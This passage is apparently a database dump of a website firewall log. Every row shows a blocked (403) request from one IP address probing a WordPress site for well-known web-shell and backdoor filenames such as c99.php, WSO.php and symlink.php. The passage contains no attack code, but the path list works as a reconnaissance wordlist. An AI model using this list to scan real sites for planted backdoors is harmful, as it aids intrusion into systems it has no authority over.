Safari\\/537.36\"}','kLM9hfPw6GArUxSenvYBi4T7',0,1673890260.0541,169,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VU5e0qFGQ7JwRKfO9Iy4kBsH',0,1673890260.2804,214,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/wp-content/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gO0FRmL1IwWGbcDeKMdPoQp4',0,1673890260.5668,163,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jcS8TfkW4F0HLgCJRuKEyr5x',0,1673890260.8036,209,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/sym403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6wCDquT32hpzk7ZnPH0yt1bQ',0,1673890261.0700,172,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/xl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','TPapgBHzlI5eiNnExXG6v3ks',0,1673890261.3093,186,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/symlink.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VUDirz2ZdqeNJKalkot0FbxP',0,1673890261.5673,218,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DbC5rH1ofevx7gdhJsSMuyL6',0,1673890261.8969,220,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pzcYLWlUmjaRgdvPinN9Bxq0',0,1673890262.1986,182,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','GZ7S4qnaCifAy8uYWbNpTU0v',0,1673890262.4785,266,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','vclwKVEdMyWQa8L1FhJX0tkA',0,1673890262.8439,202,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/ok.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QgYCtcpEJsoMkF8UA1OPmfb7',0,1673890263.1577,196,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/0.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','K9cWj2VmyxNTuiaMUs4eJ6qP',0,1673890263.4600,190,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','tOdUlo46REhcgDiIQjBq2rvG',0,1673890263.7338,193,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Rukf2edixNSr7q0L3YAGBoTX',0,1673890264.0189,199,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','TZpDytigjKXM5sOIwAHd0SlP',0,1673890264.3136,178,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/4.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','UFudZ8YrnDseMRBbaIN0WKXE',0,1673890264.5908,195,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/5.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','EImJNkjasOvu3G6H0FKwpo9S',0,1673890264.8810,219,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/6.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8KdubW3oY7IctMFzvJ0GspZQ',0,1673890265.2086,192,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/7.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','bgoeRUF8rXhOwJ7tfmz0LxTd',0,1673890265.4888,178,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gS1olVqYMAi4FeRk0JCxQpwt',0,1673890265.7283,164,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/9.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','H0KqdrXMj2cFS9kptxD746RL',0,1673890265.9533,206,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/10.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','KB8ikx4UNJZjrd13RmFYuv27',0,1673890266.2263,180,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1kFIluCPMGOZALVHxJRneW6Y',0,1673890266.4698,181,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','v0FRAjXNnkhL4YCoydTO87JM',0,1673890266.7140,185,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Xr6bnGAgfCVetIaEuzZLWc0h',0,1673890266.9751,167,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8KgQrfVCtpz6yF1IURNTE2AZ',0,1673890267.2004,169,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','k63ecRMwZbTC9vAEfz1D8X0P',0,1673890267.4399,175,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','y4OzWEh23JrfsQ08dpCemAiL',0,1673890267.6807,173,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MDUdv2CT64k0NpP9sB7wWmtQ',0,1673890267.9214,203,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','menZfQkcd52hXDVYsy8qTOuB',0,1673890268.1820,164,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VTJbv958SwzFjMndqIP6Dktc',0,1673890268.4076,207,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lxteLgPQG0qmhzb8p6KsO1cR',0,1673890268.7018,203,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/q.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','XGvjYJcmCBKlEAoNqidf8gSP',0,1673890268.9773,188,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6nYVQNwTdhKf98qRFse7A4xc',0,1673890269.2237,183,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/d.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','bsC6DEadS1IzhnHeUA4KvBtY',0,1673890269.4656,194,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1ejbBRuE2k7QM4gvPHty3DaA',0,1673890269.7805,388,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1iUD7mzrhxecOYZ85tfMLP9w',0,1673890270.2671,180,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/h.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rdAOHL4BuUQI631EzFT5J0nS',0,1673890270.5284,168,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/j.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','HJSmoAiYbWFhDr2TQORlBMUP',0,1673890270.7808,190,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wYHrpojmWXJyRV1NsEqk8bcB',0,1673890271.0424,207,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sE7vGIn9B60Wc2ObZVX1L84r',0,1673890271.3108,177,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','WjDU75Tyi0wHdVA4GCceZXpk',0,1673890271.5446,191,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8vlKfA3oPhIUe2NMc7RpbOrs',0,1673890271.7955,199,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/n.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8e0a7nNjDxioYwJ5Zhd4H1Qs',0,1673890272.0738,190,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','R5K63fyxNYhJ0Xc2ADeUlCiS',0,1673890272.3426,205,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','N7fQFhRL51yK9lPOpaouwgUk',0,1673890272.6232,178,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SgVDUY450xp6jNObzLtuQvA9',0,1673890272.8771,205,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/minimo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YzdqWa7bnmhIkVCiMFoLGR6g',0,1673890273.1446,193,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/V3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6yCi2DofxUENTGZbctI9ORJ4',0,1673890273.9720,203,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/V5.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','conM4GyAd7ZYaHiuCl0q3LSx',0,1673890274.2469,199,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/www.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RkuZUSzyV3dTMnm74gFjpisC',0,1673890274.5021,175,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Or1haudNP3zkxvLAo6XBVe9y',0,1673890274.7442,173,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','B2f7JKbwTleiVEdckFZ05xgM',0,1673890274.9891,180,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lkgvQEoDWNXyxMHjfwaiFTOK',0,1673890275.2327,176,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6zvp5BPA2KqIUQbunVerHxCm',0,1673890275.4684,221,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','zmU4DkPFX5BT6rlancMyv38i',0,1673890275.7564,175,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OVgUis2hrxPfQ6THtDAEKqpl',0,1673890275.9967,185,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','W2fkMetCp904DBNlY7uiKadb',0,1673890276.2535,227,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/nee.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','EAJVSxuP8tDNFRKmQ03BCoIO',0,1673890276.5449,199,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1ecnbBXhUYmD59W6g28Tav0r',0,1673890276.8160,171,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Enoyvqp0dZTQ1jYHM5Gbk4cf',0,1673890277.0602,173,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/87.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6m4fQI7ctTaN0bELSHqRPXol',0,1673890277.2906,186,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/7yn.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4dtmG7wC80plge3hQs9OIFUK',0,1673890277.6675,196,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','be8zjh2OPGprU5QmivYfRn9k',0,1673890278.0017,214,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/FoxWSOv1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','moVsxRtTgMHi75ukBO9KCyvP',0,1673890278.3317,213,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','p3ORWDhHiANfwCPI6xQbkd0j',0,1673890278.6238,209,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/WSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','uLerhn6kYGqCP72abiJKd3to',0,1673890278.9137,216,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iPTSNJGbQxgtZweaFY0UrjV8',0,1673890279.1910,188,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','GOtNoqKmWUcbJ8rEYgnwP4kD',0,1673890279.4592,246,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/kk.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wOEFDIlAnLbyM3Vqoi2TW9Pj',0,1673890279.7751,189,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/mrjn.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Xi1WpSs3COM4KVnHLQuzk509',0,1673890280.0286,172,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/kn.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IDsJX81GUtbTmcHegPw0AqFN',0,1673890280.2630,207,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/3301.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','cHKQqhvue9DB8EpGOSPzsJmx',0,1673890280.5417,212,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','x1HlGb6vyV0wfgdLC8ZqsXKz',0,1673890280.8281,215,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','yqf4BesUMt0mPDJrVCjxoYiO',0,1673890281.1324,235,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/wp-ad.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5JMpU3Bngr2j7YftDFcWLoOz',0,1673890282.2158,210,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/.wp-cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','EJBeLojgX0Y9NiI73mc8FwG6',0,1673890282.5461,204,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/sendmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1cdFgbekv8DSLNmpOqKj6WEr',0,1673890282.8140,205,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/rahma.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wzpQiCSBR7f6sq8OFNtMDXTE',0,1673890283.0799,188,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/nasgor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pgmCIt3ohTfxvjYP7RW6crQL',0,1673890283.3636,198,'','GET',403,0,700,0,1,'',0),('196.118.14.220',3296071388,'','https://dailyjolly.co.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 